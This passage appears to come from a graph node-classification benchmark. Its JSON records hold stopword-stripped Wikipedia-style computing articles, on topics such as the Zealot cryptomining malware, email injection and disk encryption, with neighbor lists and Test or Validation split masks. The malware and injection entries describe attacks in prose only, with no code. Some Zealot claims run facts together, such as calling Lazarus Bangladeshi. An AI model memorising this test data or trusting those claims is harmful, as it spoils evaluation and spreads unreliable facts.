16-bit examples operations tbm consists instructions complementary instruction set started bmi1 complementary nature means necessarily need used directly generated optimizing compiler supported amd introduced tbm together bmi1 piledriver line processors amd jaguar zen-based processors support tbm",
    "neighbors": [
      9092,
      2821,
      1798,
      10375,
      4491,
      6924,
      4237,
      5645,
      7313,
      4886,
      6038,
      9369,
      7963,
      9500,
      2719,
      5541,
      2088,
      2094,
      9391,
      9911,
      8120,
      8506,
      2237,
      1085,
      8125,
      8126,
      833,
      6978,
      6339,
      5444,
      7234,
      3142,
      9541,
      11080,
      2764,
      5326,
      977,
      2514,
      3537,
      2516,
      5073,
      5844,
      9428,
      4603,
      7387,
      4444,
      8795,
      3294,
      2655,
      1122,
      7783,
      1000,
      10985,
      11499,
      9964,
      5358,
      9582,
      8944,
      1137,
      499,
      1399,
      9976,
      4217,
      1915,
      10620
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7784,
    "label": 9,
    "text": "Java_Portlet_Specification:java portlet specification java portlet specification defines contract portlet container portlets provides convenient programming model java portlet developers portlets pluggable user interface software components managed displayed web portal example enterprise portal web cms portlet aggregate integrate personalize content different sources within web page portlet responds requests web client generates dynamic content portlets produce fragments markup html xhtml wml aggregated portal typically following desktop metaphor portal page displayed collection non-overlapping portlet windows portlet window displays portlet hence portlet collection portlets resembles web-based application hosted portal examples portlet applications e-mail weather reports discussion forums news portlet managed portlet container portlet standards platform independent application programming interfaces intended enable software developers create portlets plugged portal supporting standards example java portlet specification java portlet resembles java servlet produces fragments rather complete documents bound url portlet container runs portlets provides required runtime environment portlet container contains portlets manages life cycles also provides persistent storage mechanisms portlet preferences portlet container receives requests portal execute requests portlets hosted portlet container responsible aggregating content produced portlets portal handles aggregation portal portlet container built together single component application suite two separate components portal application java portlet specification v1.0 developed java community process java specification request jsr 168 released final form october 2003 java portlet specification v1.0 introduces basic portlet programming model initially java portal vendors portlet development framework thus portlets confined specific portal servers could n't deployed rest java portals jsr 168 inception java portlets may deployed java portal servers adhering jsr 168 specifications portlets catalog set portlets ready-to-use components enterprise portals want adopt portals certainly need many variety portlets deploy run portlets catalog use jsr 168 portlets catalog makes sure portlets catalog may run standards–compliant java portal server types portlet solution vertical domains technology like collaboration social networking community content management utility calendaring hrm available catalogs many open source commercial portlets catalog available jsr 168 based solutions rare jsr 168 specifications offer suitability developers reuse code maintain set jsr 168 compliant portlets deployers easy keep single set solution deploy many jsr-286 java portlet specification v2.0 developed jcp created alignment updated version 2.0 wsrp released june 2008 developed improve short-comings version 1.0 specification jsr-168 major features include jsr-362 java portlet specification v3.0 released april 2017 major features include",
    "neighbors": [
      1802,
      10506,
      9229,
      11154,
      1556,
      10020,
      10026,
      7212,
      10284,
      4658,
      2485,
      1468,
      4797,
      8644,
      11466,
      3920,
      5849,
      5593,
      6366,
      4960,
      865,
      9834,
      8689,
      3966,
      9841,
      10486,
      124,
      9726
    ],
    "mask": "Test"
  },
  {
    "node_id": 7785,
    "label": 9,
    "text": "Codelobster:codelobster codelobster portable integrated development environment ide primarily php also supports html css javascript development plug-ins available drupal wordpress smarty joomla jquery facebook codeigniter yii cakephp free registration email required 30 days use program paid versions also lite professional additional features program missing help system latest version program features syntax highlighting auto-completion sql php html css javascript xml well automatic syntax checking html css inspector like firebug also includes drupal support plugins paid offer trial periods varying length",
    "neighbors": [
      3462,
      1034,
      6154,
      6797,
      9614,
      10910,
      2465,
      2348,
      10413,
      7983,
      7346,
      190,
      6338,
      2372,
      8644,
      1353,
      4171,
      6231,
      10587,
      11357,
      479,
      3553,
      7658,
      7147,
      11503,
      4853,
      11259,
      7293
    ],
    "mask": "Test"
  },
  {
    "node_id": 7786,
    "label": 4,
    "text": "Zealot_Campaign_(Malware):zealot campaign malware zealot campaign cryptocurrency mining malware collected series stolen national security agency nsa exploits released shadow brokers group windows linux machines mine cryptocurrency specifically monero discovered december 2017 exploits appeared zealot suite include eternalblue eternalsynergy apache struts jakarta multipart parser attack exploit cve-2017-5638 notable exploit within zealot vulnerabilities includes vulnerability cve-2017-9822 known dotnetnuke dnn exploits content management system user install monero miner software estimated usd 8,500 monero mined single targeted computer campaign discovered studied extensively f5 networks december 2017 many zealot exploits leaked nsa malware suite widely described “ unusually high obfuscated payload ” meaning exploit works multiple levels attack vulnerable server systems causing large amounts damage term “ zealot ” derived starcraft series namely type warrior multi-layered attack begins two http requests used scan target vulnerable systems network similar attacks past targeted either windows linux-based systems yet zealot stands prepared version apache struts exploit along using dnn operating system os identified via java script malware loads os-specific exploit chains targeted system runs either linux os x struts payload install python agent post-exploitation stage checking target system see already infected downloads crypto-miner software often referred “ mule ” obfuscates embedded python code process different botnet malware zealot campaigns request command control c c server-specific user-agent cookie headers meaning anyone malware receive different response due zealot encrypting via rc4 cipher see network inspection security software able see malware network able scan targeted os windows struts payload downloads encoded powershell interpreter decoded two times program runs another obfuscated script turn leads device url download files file known powershell script “ scv.ps1 ” heavily obfuscated script allows attacker deploy mining software targeted device deployed software also use dynamic-link library dll mining malware deployed using reflective dll injection technique attach malware powershell processing remain undetected prior moving onto next stage program also checks see firewall active yes pipe embedded base64 embedded python code circumvent firewall another possible solution known “ little snitch ” possibly terminate firewall active post-exploitation stage program scans target system python 2.7 higher found system download following downloads python module probe.py propagate network script highly obfuscated base encryption base64 zipped 20 times downloaded zip file could named several iterations derived starcraft game files included listed files run successfully miner software introduced known commonly “ mule ” malware powershell script named “ minerd_n.ps2 ” within compressed files downloaded executed via eternalsynergy exploit software utilizes target system ’ hardware process mining cryptocurrency mining software reportedly stolen close 8,500 one victim yet total amounts mined monero still speculated among researchers initially utilized wannacry ransomware attack 2017 exploit specifically utilized mining software zealot campaign much known exploit used cooperation eternalblue along exploits zealot campaign others notably eternalsynergy involved equifax hack wannacry ransomware cryptocurrency mining campaigns asp.net based content management system dnn sends serialized object via vulnerable dnnpersonalization cookie http request stage using “ objectdataprovider ” “ objectstateformatter ” attacker embeds another object victim ’ shell system invoked shell system deliver script delivered apache struts exploit dnn acts secondary backup attackers apache struts exploit fail used deliver powershell script initiate attack exploit one two http requests sent initial stage infection among first discovered exploits zealot campaign jakarta parser exploit allowed hackers exploit “ zero-day ” flaw software hack financial firm equifax march 2017 particular exploit notable public exploits utilized largely public case still utilized december 2017 exploit patched bangladeshi-based group utilized spear-phishing method known commonly business email compromise bce steal cryptocurrency unsuspecting employees lazarus primarily targeted employees cryptocurrency financial organizations executed via word document claiming legitimate-appearing european company document opened embedded trojan virus would load onto system computer begin steal credentials malware specific malware still unknown ties zealot malware among several exploits involved march 2017 equifax data breach jakarta parser eternalblue eternalsynergy heavily involved attacking servers instead software utilized mine cryptocurrency used mine data 130 million equifax customers",
    "neighbors": [
      9375,
      5178,
      10132,
      7887
    ],
    "mask": "Test"
  },
  {
    "node_id": 7787,
    "label": 4,
    "text": "Email_injection:email injection email injection security vulnerability occur internet applications used send email messages email equivalent http header injection like sql injection attacks vulnerability one general class vulnerabilities occur one programming language embedded within another form added web page submits data web application malicious user may exploit mime format append additional information message sent new list recipients completely different message body mime format uses carriage return delimit information message raw message determines eventual destination adding carriage returns submitted form data allow simple guestbook used send thousands messages malicious spammer could use tactic send large numbers messages anonymously information topic including examples ways avoid vulnerability found securephp wiki however vulnerability limited php potentially affect application sends email messages based input arbitrary users",
    "neighbors": [
      899,
      8644,
      5636,
      8262,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 7788,
    "label": 3,
    "text": "Socket_S1:socket s1 socket s1 cpu socket type used amd turion 64 athlon 64 mobile phenom ii mobile later sempron processors debuted dual-core turion 64 x2 cpus may 17 2006 socket s1 638 pin low profile zif 1.27mm pitch socket replaces existing socket 754 mobile computing segment e.g laptops socket s1 cpus include support dual-channel ddr2 sdram dual-core mobile cpus virtualization technology compete mobile intel core 2 processor series different generations processors used variant pinouts s1 socket processors necessarily compatible socket even fit mechanically",
    "neighbors": [
      3586,
      8322,
      3588,
      8452,
      9475,
      3464,
      4872,
      7058,
      10260,
      4246,
      4767,
      2463,
      7712,
      9122,
      1322,
      11183,
      1329,
      10675,
      3892,
      8629,
      9400,
      6978,
      11331,
      9157,
      3783,
      7247,
      9551,
      7122,
      9427,
      7132,
      2525,
      4451,
      5859,
      1260,
      7151,
      1651
    ],
    "mask": "Test"
  },
  {
    "node_id": 7789,
    "label": 6,
    "text": "Coda_(file_system):coda file system coda distributed file system developed research project carnegie mellon university since 1987 direction mahadev satyanarayanan descended directly older version andrew file system afs-2 offers many similar features intermezzo file system inspired coda coda many features desirable network file systems several features found elsewhere coda uses local cache provide access server data network connection lost normal operation user reads writes file system normally client fetches hoards data user listed important event network disconnection network connection lost coda client local cache serves data cache logs updates operating state called disconnected operation upon network reconnection client moves reintegration state sends logged updates servers transitions back normal connected-mode operation also different afs coda data replication method afs uses pessimistic replication strategy files allowing one read/write server receive updates servers acting read-only replicas coda allows servers receive updates allowing greater availability server data event network partitions case afs handle unique features introduce possibility semantically diverging copies files directories known conflicts disconnected operation local updates potentially clash connected users updates objects preventing reintegration optimistic replication potentially cause concurrent updates different servers object preventing replication former case called local/global conflict latter case server/server conflict coda extensive repair tools manual automated handle repair types conflicts coda developed linux support appeared 2.1 linux kernel series also ported freebsd subsequently obsoleted efforts way bring back efforts made port coda microsoft windows windows 95/windows 98 era windows nt windows xp means open source projects like djgcc dos c compiler cygwin",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      4708,
      9836,
      9333,
      6263,
      9335,
      9343,
      7818,
      6797,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      7409,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      8976,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      823,
      3898,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      5474,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      2045,
      3582
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7790,
    "label": 7,
    "text": "Loader.io:loader.io loader.io cloud-based load scalability testing service saas allows developers test web applications api thousands concurrent connections loader.io cloud-based load testing service developers test performance scalability web applications apis provides simple cloud-based load testing born sendgrid labs late 2012",
    "neighbors": [
      170,
      467,
      101
    ],
    "mask": "Test"
  },
  {
    "node_id": 7791,
    "label": 4,
    "text": "Defense.Net:defense.net defense.net privately held american information technology services company company business protect internet-facing infrastructures – e-commerce web sites – forms distributed denial service ddos attacks network defense.net operates constellation ddos mitigation sites around internet capable filtering removing ddos attacks real-time defense.net founded barrett lyon 2012 lyon also pioneer ddos mitigation industry founder prolexic first ddos mitigation company 2014 company named one 100 hottest private companies north america red herring acquired shortly f5 networks purportedly 50 100 million 2012 bessemer venture partners lead series round funding total 9.5 million",
    "neighbors": [
      2409,
      5178
    ],
    "mask": "Test"
  },
  {
    "node_id": 7792,
    "label": 2,
    "text": "Rpath:rpath computing rpath designates run-time search path hard-coded executable file library dynamic linking loaders use rpath find required libraries specifically encodes path shared libraries header executable another shared library rpath header value named executable linkable format header standards may either override supplement system default dynamic linking search paths rpath executable shared library optional entry codice_1 section elf executable shared libraries type codice_2 called codice_2 attribute stored link time linker tools codice_4 codice_5 create modify entry later different dynamic linkers elf implement use codice_2 attribute different ways dynamic linker gnu c library searches shared libraries following locations notes gnu linker gnu ld implements feature calls new-dtags used insert rpath lower precedence codice_9 environment variable new-dtags feature enabled linker codice_28 gnu codice_29 besides setting codice_2 attribute also sets codice_8 attribute string run time dynamic linker finds codice_8 attribute ignores value codice_2 attribute effect codice_9 checked first paths codice_8 attribute searched afterwards ld dynamic linker search dt_runpath locations transitive dependencies unlike dt_rpath instead specifying codice_36 linker environment variable codice_37 set effect dynamic linker solaris specifically codice_38 sunos 5.8 similar systems looks libraries directories specified ld_library_path variable looking codice_2 attribute sun microsystems first introduce dynamic library loading sun later added rpath option ld used essential libraries added security feature gnu ld support sun-style dynamic libraries example gnu sun ld ld.so refuse load termcap program needing unless file termcap.so /lib/ named termcap.so.4 ignored /lib/termcap.so.4 removed remediate shell dies one load alternate termcap.so rescue disk needed also new termcap.so.4 rpath /lib ld.so refuse use load unless clobbered /lib/termcap.so.4 another issue n't safe copy libs /lib use restricting would-be lib tester furthermore vs. means programs needing basic termcap.so denied library deleted abi access basic support old linux/sun used allows user direct program use termcap.so specify found /usr/local/lib n using search rules ld.so.conf however gnu ld always uses /lib /usr/lib regardless first /lib/termcap.so moved /usr/local/lib mentioned ld.so.conf enables use moving libs ld.so.conf use use preferred practice use programs check version libs support use features available often skipped old releases due slow computing speed lack time code correctly said test kind thing thoroughly given platform deciding rely release administrators today guaranteed respect past guidelines documentation unix varieties link load completely different way rpath specific ld shipped particular distribution lastly said rpath security feature however mandatory access control mac techniques effective effective rpath control lib reading writing control rpath using today compilers often nearly impossible given lengthy convoluted make 1 scripting worse build scripts ignore -- disable-rpath even though present option would time-consuming frustrating probably unfeasible fix build scripting every odd program compile simple sh 1 wrapper call real ld named ld.bin wrapper filter in/out option invoking ld however note builds incorrectly use rpath instead rpath-link locate intermediate products stay build directory thus backwardly demand rpath final product new issue concerning rpath",
    "neighbors": [
      10176,
      10436,
      3876,
      8966,
      2804
    ],
    "mask": "None"
  },
  {
    "node_id": 7793,
    "label": 2,
    "text": "Mary_Gardiner:mary gardiner mary gardiner australian linux programmer director operations ada initiative described non-profit organization dedicated increasing participation women open technology culture council member linux australia september 2011 2012 gardiner ada initiative co-founder valerie aurora named two influential people computer security sc magazine gardiner co-founder aussiechix later became oceania women open tech former coordinator linuxchix speaks social norms beliefs minority contributors interested women colleagues believe women capability successfully contribute gardiner involved drafting adopting anti-harassment policies technology conferences gardiner winner 2011 rusty wrench award given linux australia service linux programmers australia commended work improve gender diversity oppose sexual harassment open-source software community keynote speaker wikimania 2012 held 12–15 july 2012 washington dc 2012 gardiner listed one 10 women tech give back datamation one influential people computer security sc magazine",
    "neighbors": [
      1026,
      5644,
      4367,
      8848,
      657,
      10642,
      1939,
      2581,
      3478,
      6808,
      7450,
      6302,
      7584,
      802,
      5410,
      6691,
      6947,
      8354,
      5931,
      8364,
      1717,
      823,
      2109,
      11069,
      10687,
      10822,
      8263,
      843,
      589,
      6352,
      4177,
      11602,
      8787,
      4437,
      6489,
      3802,
      4831,
      9696,
      11232,
      1394,
      1396,
      3189,
      11643,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 7794,
    "label": 6,
    "text": "Disk_encryption:disk encryption disk encryption technology protects information converting unreadable code deciphered easily unauthorized people disk encryption uses disk encryption software hardware encrypt every bit data goes disk disk volume used prevent unauthorized access data storage expressions full disk encryption fde whole disk encryption signify everything disk encrypted master boot record mbr similar area bootable disk code starts operating system loading sequence encrypted hardware-based full disk encryption systems truly encrypt entire boot disk including mbr transparent encryption also known real-time encryption on-the-fly encryption otfe method used disk encryption software transparent refers fact data automatically encrypted decrypted loaded saved transparent encryption files accessible immediately key provided entire volume typically mounted physical drive making files accessible unencrypted ones data stored encrypted volume read decrypted without using correct password/keyfile correct encryption keys entire file system within volume encrypted including file names folder names file contents meta-data transparent end user transparent encryption usually requires use device drivers enable encryption process although administrator access rights normally required install drivers encrypted volumes typically used normal users without rights general every method data seamlessly encrypted write decrypted read way user and/or application software remains unaware process called transparent encryption disk encryption replace file encryption situations disk encryption sometimes used conjunction filesystem-level encryption intention providing secure implementation since disk encryption generally uses key encrypting whole drive data decryptable system runs however disk encryption solutions use multiple keys encrypting different volumes attacker gains access computer run-time attacker access files conventional file folder encryption instead allows different keys different portions disk thus attacker extract information still-encrypted files folders unlike disk encryption filesystem-level encryption typically encrypt filesystem metadata directory structure file names modification timestamps sizes trusted platform module tpm secure cryptoprocessor embedded motherboard used authenticate hardware device since tpm chip unique particular device capable performing platform authentication used verify system seeking access expected system limited number disk encryption solutions support tpm implementations wrap decryption key using tpm thus tying hard disk drive hdd particular device hdd removed particular device placed another decryption process fail recovery possible decryption password token although advantage disk removed device might create single point failure encryption example something happens tpm motherboard user would able access data connecting hard drive another computer unless user separate recovery key multiple tools available market allow disk encryption however vary greatly features security divided three main categories software-based hardware-based within storage device hardware-based elsewhere cpu host bus adaptor hardware-based full disk encryption within storage device called self-encrypting drives impact performance whatsoever furthermore media-encryption key never leaves device therefore available virus operating system trusted computing group opal storage specification provides industry accepted standardization self-encrypting drives external hardware considerably faster software-based solutions although cpu versions may still performance impact media encryption keys well protected solutions boot drive require pre-boot authentication component available types solutions number vendors important cases authentication credentials usually major potential weakness since symmetric cryptography usually strong secure safe recovery mechanisms essential large-scale deployment disk encryption solutions enterprise solution must provide easy secure way recover passwords importantly data case user leaves company without notice forgets password challenge–response password recovery mechanism allows password recovered secure manner offered limited number disk encryption solutions benefits challenge–response password recovery emergency recovery information eri file provides alternative recovery challenge–response mechanism unfeasible due cost helpdesk operatives small companies implementation challenges benefits eri-file recovery full disk encryption schemes vulnerable cold boot attack whereby encryption keys stolen cold-booting machine already running operating system dumping contents memory data disappears attack relies data remanence property computer memory whereby data bits take several minutes degrade power removed even trusted platform module tpm effective attack operating system needs hold decryption keys memory order access disk full disk encryption also vulnerable computer stolen suspended wake-up involve bios boot sequence typically ask fde password hibernation contrast goes via bios boot sequence safe software-based encryption systems vulnerable various side channel attacks acoustic cryptanalysis hardware keyloggers contrast self-encrypting drives vulnerable attacks since hardware encryption key never leaves disk controller also full disk encryption schemes n't protect data tampering silent data corruption i.e bitrot means provide privacy integrity block cipher-based encryption modes used full disk encryption authenticated encryption concerns storage overhead needed authentication tags thus tampering would done data disk data would decrypted garbled random data read hopefully errors may indicated depending data tampered case os metadata – file system case file data – corresponding program would process file one ways mitigate concerns use file systems full data integrity checks via checksums like btrfs zfs top full disk encryption however cryptsetup started experimentally support authenticated encryption full disk encryption several benefits compared regular file folder encryption encrypted vaults following benefits disk encryption one issue address full disk encryption blocks operating system stored must decrypted os boot meaning key available user interface ask password full disk encryption solutions utilize pre-boot authentication loading small highly secure operating system strictly locked hashed versus system variables check integrity pre-boot kernel implementations bitlocker drive encryption make use hardware trusted platform module ensure integrity boot environment thereby frustrate attacks target boot loader replacing modified version ensures authentication take place controlled environment without possibility bootkit used subvert pre-boot decryption pre-boot authentication environment key used encrypt data decrypted external key input system solutions storing external key include possibilities varying degrees security however better unencrypted disk",
    "neighbors": [
      7040,
      2050,
      647,
      10631,
      4746,
      5003,
      8331,
      4366,
      9745,
      1810,
      9625,
      9882,
      9343,
      672,
      9762,
      4389,
      6309,
      9894,
      3880,
      10405,
      3629,
      7983,
      1456,
      5552,
      434,
      10801,
      52,
      11568,
      3382,
      8119,
      5433,
      1978,
      7354,
      7229,
      6975,
      4032,
      4801,
      8640,
      9281,
      8772,
      9285,
      9791,
      6602,
      7244,
      7117,
      7635,
      4438,
      11095,
      1369,
      6361,
      91,
      8283,
      3422,
      6494,
      10207,
      10850,
      7139,
      4071,
      9319,
      2027,
      7151,
      2416,
      3572,
      5749,
      6644,
      8052,
      2811,
      4348,
      4221,
      2558,
      8446
    ],
    "mask": "Test"
  },
  {
    "node_id": 7795,
    "label": 2,
    "text": "Abort,_Retry,_Fail?:abort retry fail abort retry fail abort retry ignore error message found dos operating systems prompts end-user course action follow message cited example poor usability computer user interfaces cp/m attempting read floppy disk drive door open would hang disk inserted disk drive door closed early disk hardware send kind signal disk spinning timeout detect lack signal required much code tiny systems many users cp/m became accustomed method managing multiple disks opening disk drive stop program reading writing file correct disk could inserted primary design consideration pc dos software written cp/m portable dos without changes even first ibm pc hardware told operating system disk drive door open returning error software trying read disk would break ability manage disks way without changes still desirable improve experience particular giving user way get hang without find disk insert drive prompt invented reason missing disk disk drive door opened defined dos critical error would call critical error handler default critical error handler part command.com printed abort retry ... prompt waited user input problems particular checksum error reading data disk also defined critical error thus causing prompt appear reasons missing disk opened disk drive users could press key indicate wanted happen available options included program could install critical error handler running many sophisticated programs particular full screen programs order avoid messages disturbing display programs faked missing fail response dos 2.0 jumping back calling program skipping return stack dos risky hack relied stack layout skipped cleanup operations operating system error messages described example poor user interface design users message appeared choice hit r'—which repeated message—or hit another letter caused program crash work lost one scholar described way hard disks larger removable media zip drives made need manage multiple disks obsolete thus made prompt useless gradually replaced code acted like fail immediately dos 3.3 command.com provided startup option codice_1 order force default critical error handler return fail errors starting version 4.0 alternative command line processors 4dos ndos supported codice_1 corresponding codice_3 directive codice_4/codice_5 well option also supported command.com pts-dos 6.51 s/dos 1.0 well dr-dos 7.02 higher opendos 7.01 command.com provides similar feature codice_6 described install critical error handler still supported newer versions operating systems linux always act like fail cases humorous variations edgar allen poe raven using abort retry ignore place nevermore written 1980s 1990s quite popular distributed bulletin board email original best known version credited cleveland poet marcus bales adapted numerous times attributed anonymous lucy blades rob collins others 1993 neil howe published 13th gen abort retry ignore fail sympathetic book culture generation x 1996 white town released ep entitled abort retry fail pc magazine used term title column highlighting humorous computer-related errors",
    "neighbors": [
      4870,
      2571,
      9166,
      6319,
      5520,
      5744,
      3474,
      7983,
      8852,
      11444,
      4409,
      10333,
      1694,
      9919
    ],
    "mask": "Test"
  },
  {
    "node_id": 7796,
    "label": 2,
    "text": "Windows_Insider:windows insider windows insider open software testing program microsoft allows users valid license windows 10 windows server 2016 register pre-release builds operating system previously accessible software developers microsoft launched windows insider developers enterprise testers technically able test new developer features pre-release software builds given publicly released gather low level diagnostics feedback order identify investigate mitigate improve windows 10 os help support guidance insider program participants direct communication microsoft engineers via proprietary communication diagnostic channel announced september 30 2014 along windows 10 september 2015 7 million people took part windows insider program february 12 2015 microsoft started test previews windows 10 mobile microsoft announced windows insider program would continue beyond official release windows 10 future updates gabriel aul previous head charge windows insider program current head windows insider program dona sarkar similar windows insider program microsoft office bing xbox visual studio code teams set insider programs microsoft originally launched windows insider enterprise testers technically able test new developer features gather feedback improve features built windows 10 time official launch windows 10 pcs total 5 million volunteers registered windows 10 windows 10 mobile also among first people receive official update windows 10 release windows 10 windows insider app merged settings app made ability install windows insider preview builds optional feature could accessed directly within windows 10 may 2017 microsoft announced program would extend windows server 2016 first insider build operating system released 13 july 2017 windows 10 insider preview updates delivered testers different rings logical categories windows insiders fast ring receive updates prior windows insiders slow ring might experience bugs issues february 2016 microsoft introduced new rings windows insider preview july 17 2017 reports began come windows 10 creators update refused install pcs tablets sporting intel atom clover trail processors first appeared though might temporary block microsoft hardware partners work fix issues preventing operating system run well however microsoft later confirmed devices running clover trail intel atom processors would receiving creators update processors longer supported intel appropriate firmware properly run versions windows 10 newer anniversary update following processors longer supported remain windows 10 anniversary update pcs unsupported processors could receive new features updates microsoft agreed extend support pcs bug fixes security updates latest compatible version windows 10 versions windows 10 released microprocessor released also supported installations operating systems may actively blocked example windows 10 version 1507 ltsb install kaby lake processors microsoft initially launched windows 10 technical preview certain third-generation x30 series phones lumia family subsequently released second-generation x20 series devices throughout testing phase hacked non-lumia phones supported time download preview builds microsoft responded blocking unsupported models roll back installed technical preview back windows phone 8.1 microsoft launched windows device recovery tool removes windows 10 recovers latest officially released software firmware preview build 10080 released may 14 2015 first support non-lumia device htc one m8 windows followed xiaomi partnership microsoft released rom port windows 10 flagship mi 4 handset june 1 2015 time limited certain registered users china build 10080 follow-up build 10166 also added support fourth-generation lumia x40 series devices result compatible windows phone 8 later lumia phones support preview august 2015 microsoft stated windows phone devices including microsoft new hardware partners announced previous year would receive final version windows 10 mobile would receive preview builds insider program however company provide information time whether new devices would added preview program microsoft instead focused promoting new devices come windows 10 mobile including lumia 950 lumia 950 xl flagships low-cost lumia 550 lumia 650 since release new windows 10 devices became eligible receive future updates advance via insider program beginning build 10586 december 4 2015 windows-based lg lancet also received version upgraded since february 19 2016 microsoft released first windows 10 mobile redstone preview build 14267 starting build future preview versions became exclusively available devices already running non-insider preview os except mi4 rom version followed build 14291 released existing windows 10 devices march 17 2016 conjunction official rtm release windows 10 mobile third fourth-generation lumias following week became available newly upgraded older lumias addition several devices already windows 10 mobile time supported devices subsequently received insider preview builds far build 15063 creators update released march 20 2017 included official release build 14393 anniversary update august 2 2016 however announced april 2017 many devices including third-generation lumias would receive rtm version creators update redstone development builds following feedback users devices remain supported nearly except lumia 640 xl variant originally come windows 10 mobile instead windows phone 8.1",
    "neighbors": [
      11270,
      5643,
      4624,
      11283,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      11301,
      1577,
      6697,
      10281,
      7212,
      1581,
      2101,
      8757,
      10812,
      3648,
      582,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      6221,
      9808,
      4178,
      10839,
      603,
      9819,
      8798,
      3170,
      10338,
      8296,
      617,
      5225,
      8299,
      622,
      9839,
      4210,
      1656,
      6265,
      7290,
      4731,
      636,
      8315,
      639,
      10879,
      641,
      8841,
      651,
      6797,
      2193,
      9874,
      2196,
      10388,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      6827,
      2221,
      3250,
      5300,
      9910,
      7351,
      10428,
      2749,
      4289,
      2244,
      8391,
      200,
      9420,
      10957,
      4316,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10989,
      10993,
      3834,
      1791,
      8959,
      11519,
      4356,
      11524,
      782,
      3856,
      3857,
      8976,
      3351,
      8473,
      8985,
      11546,
      8988,
      11549,
      7456,
      7970,
      5413,
      1832,
      3881,
      5928,
      6441,
      10024,
      10026,
      10029,
      7983,
      3890,
      1844,
      9525,
      11572,
      10039,
      6972,
      6462,
      321,
      3394,
      9033,
      3922,
      11605,
      2391,
      4439,
      5465,
      11103,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      8576,
      3463,
      1418,
      5003,
      5004,
      1935,
      8080,
      4505,
      11677,
      929,
      4515,
      11683,
      3496,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      7615,
      960,
      7106,
      8132,
      6088,
      969,
      3535,
      4051,
      8659,
      9173,
      11221,
      1498,
      5594,
      478,
      5600,
      6114,
      6115,
      8681,
      4074,
      6637,
      9709,
      5103,
      6641,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 7797,
    "label": 9,
    "text": "MARK_IV_(software):mark iv software mark iv fourth-generation programming language created informatics inc. 1960s informatics took advantage ibm decision mark iv first software product cumulative sales 10 million mark iv developed ibm systems 360 370 rca spectra 70 main benefit allowing faster application development order 6 10 times faster system using 3gl cobol mark iv early 4gl allowed user development systems related business 1971 ad informatics several quotes customers mark iv went sterling software 1985 part company acquisition informatics general vision builder part product suite computer associates",
    "neighbors": [
      4042,
      284
    ],
    "mask": "Test"
  },
  {
    "node_id": 7798,
    "label": 4,
    "text": "Reverse_Deception:reverse deception reverse deception organized cyber threat counter-exploitation textbook investigates two topics first provides methods criteria rectify advanced persistent threats secondly covers cyber deception ieee review noted masterful presentation deception details identity apts prioritize actions applying skilled field-tested private- government- sector processes methods often involves cyber deception identified richard austin ieee review masterful presentation deception clear work interest different governments several currently involved considering future actions weaponizing cyber capabilities appears recommended reading lists notable u.s. military institutions including u.s. navy war college counterintelligence cyber threat section joint special operations university site military organizations made efforts similar manner people republic china prc considered active apt market special military effort undertaken translate simplified chinese prc national defense university press authors introduce first theory model classifying threat opportunistic-apt continuum either persistent non-persistent widely used industry built evaluation following criteria apt criteria additional content includes beer p. d. basie s. v. 2013 case cyber counterintelligence 2013 international conference adaptive science technology doi:10.1109/icastech.2013.6707493 carli l. d. sommer r. jha s. 2014 beyond pattern matching proceedings 2014 acm sigsac conference computer communications security ccs 14. doi:10.1145/2660267.2660361 csanádi g. 2015 cyber war poor man weapon mass destruction new whip hands rich defence review central journal hungarian defence forces,143 2015th ser. 154-174 chung k. kamhoua c. a. kwiat k. a. kalbarczyk z. t. iyer r. k. 2016 game theory learning cyber security monitoring 2016 ieee 17th international symposium high assurance systems engineering hase doi:10.1109/hase.2016.48 conti g. weigand m. skoudis e. raymond d. cook t. t. a. ragsdale d. 2014 towards cyber leader course weak faint hearted 3rd ed. vol 1337 rep. west point ny army cyber institute department electrical engineering computer science united states military academy gardner b 2018 social engineering non-linear warfare journal applied digital evidence 1 1 heckman k. e. stech f. j. thomas r. k. schmoker b. tsow a. w. 2015 cyber denial deception counter deception framework supporting active cyber defense heginbotham e. nixon m. morgan f. e. heim j. l. hagen j. li s. morris l. j 2015 u.s.-china military scorecard forces geography evolving balance power 1996 2017 santa monica ca rand henderson b. t. 2018 honeypot spies understanding internet-based data theft unpublished master thesis naval postgraduate school holguín j. m. moreno m. merino b 2013 detección de apts p. 9 rep. jajodia s. subrahmanian v. s. swarup v. wang c. 2016 cyber deception building scientific foundation lucas e. 2017 cyberphobia identity trust security internet bloomsbury maozhi y. ziwei l. 2015 mission scale chinese communist party strategic support force 中共戰略支援部隊的任務與規模 y. lin trans. pavlíková m. 2016 cyber operations russia ukraine ukrainian conflict obrana strategie defence strategy ,16 1 77-94. doi:10.3849/1802-7199.16.2016.1.077-094 rowe n. c. rrushi j 2018 introduction cyberdeception springer saadawi t. n. jordan l. boudreau v. colwell j 2011 cyber infrastructure protection carlisle pa strategic studies institute u.s. army war college sowa 2019 it-revision bei betrugsaufdeckung investigation und 